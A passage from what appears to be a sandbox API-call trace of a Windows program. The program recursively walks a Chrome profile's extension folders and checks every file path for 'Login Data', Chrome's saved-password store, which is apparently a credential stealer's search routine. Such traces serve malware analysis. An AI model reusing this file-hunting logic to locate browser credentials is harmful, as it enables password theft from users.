HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\messages.json" [0161.758] VirtualQuery (in: lpAddress=0x91b1e0, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.758] GetProcessHeap () returned 0x8e0000 [0161.758] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1e0 | out: hHeap=0x8e0000) returned 1 [0161.758] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\messages.json", lpSrch="Login Data") returned 0x0 [0161.758] VirtualQuery (in: lpAddress=0x91b308, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.758] GetProcessHeap () returned 0x8e0000 [0161.758] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b308 | out: hHeap=0x8e0000) returned 1 [0161.758] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86644070, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86644070, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.758] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.758] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.758] GetProcessHeap () returned 0x8e0000 [0161.758] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.758] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.758] GetProcessHeap () returned 0x8e0000 [0161.758] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.758] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8666a1d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86690330, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86690330, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="ro", cAlternateFileName="")) returned 1 [0161.758] lstrcmpiW (lpString1="ro", lpString2=".") returned 1 [0161.758] lstrcmpiW (lpString1="ro", lpString2="..") returned 1 [0161.759] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.759] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.759] lstrlenW (lpString="\\") returned 1 [0161.759] GetProcessHeap () returned 0x8e0000 [0161.759] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.759] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" [0161.759] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.759] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned 135 [0161.759] lstrlenW (lpString="ro") returned 2 [0161.759] GetProcessHeap () returned 0x8e0000 [0161.759] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.759] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.759] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\", lpString2="ro" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro" [0161.759] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.759] GetProcessHeap () returned 0x8e0000 [0161.759] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.759] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro") returned 137 [0161.759] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro") returned 137 [0161.759] lstrlenW (lpString="\\*.*") returned 4 [0161.759] GetProcessHeap () returned 0x8e0000 [0161.759] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.759] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro" [0161.759] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\*.*" [0161.759] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8666a1d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86690330, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86690330, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.759] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.759] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8666a1d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86690330, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86690330, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="..", cAlternateFileName="")) returned 1 [0161.760] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.760] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.760] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86690330, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8668fb60, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd5, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.760] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro") returned 137 [0161.760] lstrlenW (lpString="\\") returned 1 [0161.760] GetProcessHeap () returned 0x8e0000 [0161.760] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.760] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro" [0161.760] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\" [0161.760] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\") returned 138 [0161.760] lstrlenW (lpString="messages.json") returned 13 [0161.760] GetProcessHeap () returned 0x8e0000 [0161.760] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.760] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\" [0161.760] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json" [0161.760] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.760] GetProcessHeap () returned 0x8e0000 [0161.760] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.760] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json", lpSrch="Login Data") returned 0x0 [0161.760] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.760] GetProcessHeap () returned 0x8e0000 [0161.760] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.760] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86690330, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8668fb60, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd5, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.760] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.760] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.760] GetProcessHeap () returned 0x8e0000 [0161.760] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.760] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.760] GetProcessHeap () returned 0x8e0000 [0161.760] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.761] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86690330, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86690330, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86690330, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="ru", cAlternateFileName="")) returned 1 [0161.761] lstrcmpiW (lpString1="ru", lpString2=".") returned 1 [0161.761] lstrcmpiW (lpString1="ru", lpString2="..") returned 1 [0161.761] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.761] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.761] lstrlenW (lpString="\\") returned 1 [0161.761] GetProcessHeap () returned 0x8e0000 [0161.761] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.761] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" [0161.761] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.761] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned 135 [0161.761] lstrlenW (lpString="ru") returned 2 [0161.761] GetProcessHeap () returned 0x8e0000 [0161.761] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.761] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.761] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\", lpString2="ru" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru" [0161.761] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.761] GetProcessHeap () returned 0x8e0000 [0161.761] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.761] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru") returned 137 [0161.761] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru") returned 137 [0161.761] lstrlenW (lpString="\\*.*") returned 4 [0161.761] GetProcessHeap () returned 0x8e0000 [0161.761] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.761] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru" [0161.761] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\*.*" [0161.761] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86690330, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86690330, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86690330, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.762] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.762] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86690330, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86690330, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86690330, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="..", cAlternateFileName="")) returned 1 [0161.762] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.762] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.762] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86690330, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8668fb60, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x10a, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.762] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru") returned 137 [0161.762] lstrlenW (lpString="\\") returned 1 [0161.762] GetProcessHeap () returned 0x8e0000 [0161.762] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.762] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 